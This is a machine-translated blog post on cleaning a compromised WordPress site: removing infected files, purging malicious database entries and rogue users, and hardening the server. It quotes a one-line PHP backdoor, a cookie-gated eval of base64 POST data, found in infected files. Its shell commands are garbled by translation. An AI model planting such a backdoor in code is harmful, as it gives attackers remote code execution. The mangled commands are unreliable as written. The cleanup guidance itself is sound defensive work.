Before you read this post, you should see post here, To understand something. :)
I found it in several blog files on stealthsettings.com, codes similar to the ones below, which appeared as a result of the virus with the feat of WordPress.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
If it's above file xmlrpc.php full SleepyBut at a grep server, you can see that there are quite a few of its kind in source code.
Cleaning infected files:
Ooookkkk ...
1. The best solution, after it had backupAnd cleaned the database is to wipe files WordPress (you can keep wp-config.php and files that are not strictly related to the wp platform, after they are carefully checked) from the server and upload the original ones from the version 2.5.1 (During this make a WP version upgrade :)) http://wordpress.org/download/ . Wipe including theme files if you do not trust that their careful checking.
It seems to have been affected and files of the themes that have not been used before on the blog and simply changing the theme, does not solve the problem.
./andreea/wp-content/themes/default/index.php:
2. Search and delete all files containing: * _new.php, * _old.php, *. Jpgg, *. Giff, *. Pngg and file wp-info.txt, if any.
find. -name “* _new.php”
find. -name “* _old.php”
find. -name "* .jpgg"
find. -name “* _giff”
find. -name “* _pngg”
find. -name “wp-info.txt”
3. in / Tmp , Search and delete folders like tmpYwbzT2
SQL Cleaning :
1. in Table Table wp_options see if there is delete the lines: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. All in wp_options, go to active_plugins and delete if there is a plugin that ends in one of the extensions * _new.php, * _old.php, *. jpgg, *. giff, *. pngg or if another extension is suspected, check carefully.
3. table wp_users, See if there is a user who has not written anything in his right, the column user_nicename. Delete this user, but remember the number on the ID column. This user is likely to use "WordPress”Ca user_login and appears to be created on 00: 00: 00 0000-00-00.
4. Go to the Table wp_usermeta and delete all lines belonging ID above.
After you have done this sql cleanup, disable and then activate any plugin. (in blog -> Dashboard -> Plugins)
Secure server:
1. See what directories and files are "writable"(chmod 777) and try to put a chmod which will no longer allow their writing at any level. (chmod 644, for example)
find. -Allows -2 -ls
2. See what files have the bit set suid or sgid . If you do not use those files put on them chmod 0 or uninstall the package that it contains. Are very dangerous, because they execute privileges "group"Or"root"And not with normal user privileges to execute that file.
find /-type f-perm-04000-ls
find /-type f-perm-02000-ls
3. Check which ports are open and try to close or secure those that are not used.
netstat-an | grep-i listen
About it. I see Some blogs are banned de Google Search and others say "He did them well!!!" . Well, I would have done it for them...but what do you say if Google starts banning all sites forming IS SPAM and put Trojans (Trojan.Clicker.HTML) in cookies?
1 thought on "WordPress Exploit - Clean up virus files, SQL and server security. ”